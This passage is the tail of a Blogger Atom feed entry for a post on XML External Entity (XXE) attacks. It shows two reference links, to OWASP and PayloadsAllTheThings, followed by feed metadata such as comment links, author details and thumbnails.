&lt;li&gt;&lt;a href=&quot;https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing&quot; target=&quot;_blank&quot;&gt;https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XXE%20Injection/README.md&quot; target=&quot;_blank&quot;&gt;https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XXE%20Injection/README.md&lt;/a&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='https://ecchiexploit.blogspot.com/feeds/2075488152888053492/comments/default' title='Posting Komentar'/><link rel='replies' type='text/html' href='https://ecchiexploit.blogspot.com/2020/05/xml-external-entity-xee.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/2116688564507620479/posts/default/2075488152888053492'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/2116688564507620479/posts/default/2075488152888053492'/><link rel='alternate' type='text/html' href='https://ecchiexploit.blogspot.com/2020/05/xml-external-entity-xee.html' title='XML External Entity [XEE]'/><author><name>Hari | ./EcchiExploit</name><uri>http://www.blogger.com/profile/05595060091488928047</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdAm9oQZUtl-mM7sSuIp2I9yPPKDz8At2k4IzLqjfXGl8guU-WaeH7fwVxXSGHbx0vRxEOdAPYRxmIBz7mnAa3_JXtIK3WOUO_7n3Qgxl-0bbpfnogLIAFC_6yDakniA/s220/IMG-20200408-WA0076.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfgQe-AQFt8ll8QHUmUeQhNOD_ea-Wz17IW_pn9alsHvW_1FT9QmiHvTz3A34ypc5Mt2rFjxIod-ji9ytTyXYkNCL9OJyKrsj9O7SMtAwafphEKtZrrX61ntCl8KBAReItskoG9yTe6b0y/s72-c/IMG-20200510-WA0609.jpg" height="72" width="72"/><thr:total>0</thr:total></entry></feed>